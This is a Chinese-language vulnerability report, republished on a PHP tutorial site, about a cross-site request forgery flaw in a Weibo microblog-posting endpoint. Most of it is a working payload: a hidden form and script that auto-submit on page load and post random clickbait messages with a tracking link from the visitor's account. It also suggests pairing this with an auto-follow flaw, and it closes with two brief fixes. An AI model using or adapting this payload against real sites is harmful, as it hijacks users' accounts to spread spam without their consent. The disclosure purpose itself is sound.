来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 顺便结合之前发的自动加关注漏洞,完美结合!详细说明:微数据 发微博缺少来源验证漏洞证明:form action=http://data.weibo.com/mydata/ajax/post method=post id=f2 target=ifr2input name=te......
|
顺便结合之前发的自动加关注漏洞,完美结合!
详细说明:微数据 发微博缺少来源验证 漏洞证明: <form action="http://data.weibo.com/mydata/ajax/post" method="post" id="f2" target="ifr2"> <input name="text" id="updatemsg" value=""> <input name="picid" value="6d115173jw1dqo6buv5r0j"> <input name="pic" value="http://ww1.sinaimg.cn/large/6d115173jw1dqo6buv5r0j.jpg"> <input type="submit"> </form> <iframe id="ifr2" name="ifr2"></iframe> <script> function rand_msg(){ var url = ' http://weibonews.sinaapp.com/data.php?id=' + new Date().getTime(); var msgs = [ '晒一个 www.2cto.com 90后男生的惊人结婚帐:', '怀二胎PP想尽办法逼我生儿子:', '明星成名前的卑微职业曝光:', '户籍制度改革终于艰难起步:', '白静被杀,盘点因情变酿成悲剧的明星们(图):', '终于曝光:朝鲜战争中被埋没了50年的惊人真相:', '主席一句话:周总理惊呆了,尼克松心服了 :']; var msg = msgs[Math.floor(Math.random()*msgs.length)] + url; return msg; } function update(msg){ document.getElementById('updatemsg').value=encodeURIComponent(rand_msg()) document.getElementById('f2').submit(); } update(rand_msg()); </script> 修复方案: 1.加来源限制 2.加是否是ajax判断 作者 songlv |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
